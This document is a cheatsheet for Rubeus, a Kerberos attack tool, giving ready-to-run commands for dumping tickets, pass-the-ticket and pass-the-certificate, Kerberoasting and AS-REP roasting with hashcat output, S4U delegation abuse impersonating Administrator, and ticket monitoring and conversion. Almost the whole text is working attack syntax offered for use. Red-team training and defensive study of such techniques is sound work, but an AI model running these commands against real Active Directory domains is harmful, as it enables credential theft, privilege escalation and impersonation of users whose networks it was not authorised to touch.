Rubeus Cheatsheet
Basic Syntax
Rubeus.exe <command> [options]
Quick Reference Commands
| Command | Purpose |
|---|---|
dump | Dump all Kerberos tickets |
asktgt | Request a TGT using hash or password |
asktgs | Request a TGS for a specific service |
ptt | Pass the Ticket (import ticket) |
createnetonly | Create sacrificial logon session |
renew | Renew a TGT |
describe | Describe a ticket |
hash | Calculate Kerberos hashes from password |
kerberoast | Kerberoast attack |
asreproast | AS-REP Roasting attack |
s4u | S4U constrained delegation abuse |
PKINIT (Certificate Authentication)
Request TGT with PFX Certificate
Rubeus.exe asktgt /user:<user> /domain:<domain> /certificate:<path_or_base64> /password:<pfx_password> /nowrap
Request TGT with PFX and Import
Rubeus.exe asktgt /user:<user> /domain:<domain> /certificate:C:\cert.pfx /password:CertPass123 /ptt
Note: Used in Pass-the-Certificate attacks after obtaining a certificate from AD CS exploitation or Shadow Credentials attacks.
Ticket Harvesting
Dump All Tickets (Base64)
Rubeus.exe dump /nowrap
Dump Tickets for Current User
Rubeus.exe dump /user:current /nowrap
Dump Specific Service Tickets
Rubeus.exe dump /service:krbtgt /nowrap
Triage (List Tickets)
Rubeus.exe triage
Request Tickets (asktgt)
Request TGT with NTLM Hash (RC4)
Rubeus.exe asktgt /user:<user> /domain:<domain> /rc4:<ntlm_hash> /nowrap
Request TGT with AES256 Hash
Rubeus.exe asktgt /user:<user> /domain:<domain> /aes256:<aes256_hash> /nowrap
Request TGT with Password
Rubeus.exe asktgt /user:<user> /domain:<domain> /password:<password> /nowrap
Request TGT and Import (/ptt)
Rubeus.exe asktgt /user:<user> /domain:<domain> /aes256:<hash> /ptt
Request TGT Using Domain Controller
Rubeus.exe asktgt /user:<user> /domain:<domain> /rc4:<hash> /dc:<dc_ip> /nowrap
Request TGT with Certificate (PKINIT)
Rubeus.exe asktgt /user:<user> /domain:<domain> /certificate:<base64_or_path> /password:<pfx_password> /nowrap
Request TGT with Certificate File
Rubeus.exe asktgt /user:<user> /domain:<domain> /certificate:C:\path\to\cert.pfx /password:<pfx_password> /ptt
Pass the Ticket (ptt)
Import .kirbi File
Rubeus.exe ptt /ticket:<path_to_kirbi>
Import Base64 Ticket
Rubeus.exe ptt /ticket:<base64_encoded_ticket>
Sacrificial Process (createnetonly)
Create a hidden process with a new logon session:
Rubeus.exe createnetonly /program:"C:\Windows\System32\cmd.exe" /show
Then in the new window, request a ticket:
Rubeus.exe asktgt /user:<user> /domain:<domain> /aes256:<hash> /ptt
Kerberoasting
Kerberoast All Users
Rubeus.exe kerberoast /nowrap
Kerberoast Specific User
Rubeus.exe kerberoast /user:<username> /nowrap
Kerberoast with Output Format for Hashcat
Rubeus.exe kerberoast /format:hashcat /nowrap
Kerberoast with AES Encryption
Rubeus.exe kerberoast /aes /nowrap
AS-REP Roasting
AS-REP Roast All Users
Rubeus.exe asreproast /nowrap
AS-REP Roast Specific User
Rubeus.exe asreproast /user:<username> /nowrap
AS-REP Roast with Hashcat Format
Rubeus.exe asreproast /format:hashcat /nowrap
Request Service Tickets (asktgs)
Request TGS for Service
Rubeus.exe asktgs /ticket:<tgt_base64> /service:cifs/server.domain.local /nowrap
Request TGS and Import
Rubeus.exe asktgs /ticket:<tgt_base64> /service:cifs/server.domain.local /ptt
Constrained Delegation (S4U)
S4U2Self and S4U2Proxy
Rubeus.exe s4u /user:<service_account> /rc4:<hash> /impersonateuser:Administrator /msdsspn:cifs/target.domain.local /ptt
S4U with Alternate Service
Rubeus.exe s4u /user:<service_account> /aes256:<hash> /impersonateuser:Administrator /msdsspn:cifs/target.domain.local /altservice:ldap /ptt
Ticket Operations
Describe a Ticket
Rubeus.exe describe /ticket:<base64_or_path>
Renew a TGT
Rubeus.exe renew /ticket:<base64_or_path> /nowrap
Purge Tickets (Current Session)
Rubeus.exe purge
Purge Tickets (Specific LUID)
Rubeus.exe purge /luid:<luid>
Hash Calculation
Calculate Kerberos Hashes from Password
Rubeus.exe hash /user:<username> /domain:<domain> /password:<password>
Output includes:
- rc4_hmac (NTLM)
- aes128_cts_hmac_sha1
- aes256_cts_hmac_sha1
- des_cbc_md5
Monitoring
Monitor for TGTs (4624 Logon Events)
Rubeus.exe monitor /interval:5
Monitor with Filtering
Rubeus.exe monitor /interval:5 /filteruser:<username>
Common Options
| Option | Description |
|---|---|
/nowrap | Donโt wrap Base64 output (easier copy-paste) |
/ptt | Pass the ticket (import into current session) |
/dc:<ip> | Specify domain controller |
/domain:<domain> | Specify domain |
/user:<user> | Specify user |
/outfile:<path> | Write ticket to file |
/luid:<luid> | Target specific logon session |
One-Liners
Dump All Tickets
Rubeus.exe dump /nowrap
Request TGT and Import
Rubeus.exe asktgt /user:john /domain:domain.local /aes256:<hash> /ptt
Kerberoast and Save
Rubeus.exe kerberoast /format:hashcat /outfile:hashes.txt
Create Sacrificial Session and Request TGT
Rubeus.exe createnetonly /program:cmd.exe /show
:: In new window:
Rubeus.exe asktgt /user:john /domain:domain.local /rc4:<hash> /ptt
Convert .kirbi to Base64 (PowerShell)
[Convert]::ToBase64String([IO.File]::ReadAllBytes("ticket.kirbi"))
Convert Base64 to .kirbi (PowerShell)
[IO.File]::WriteAllBytes("ticket.kirbi", [Convert]::FromBase64String("<base64_string>"))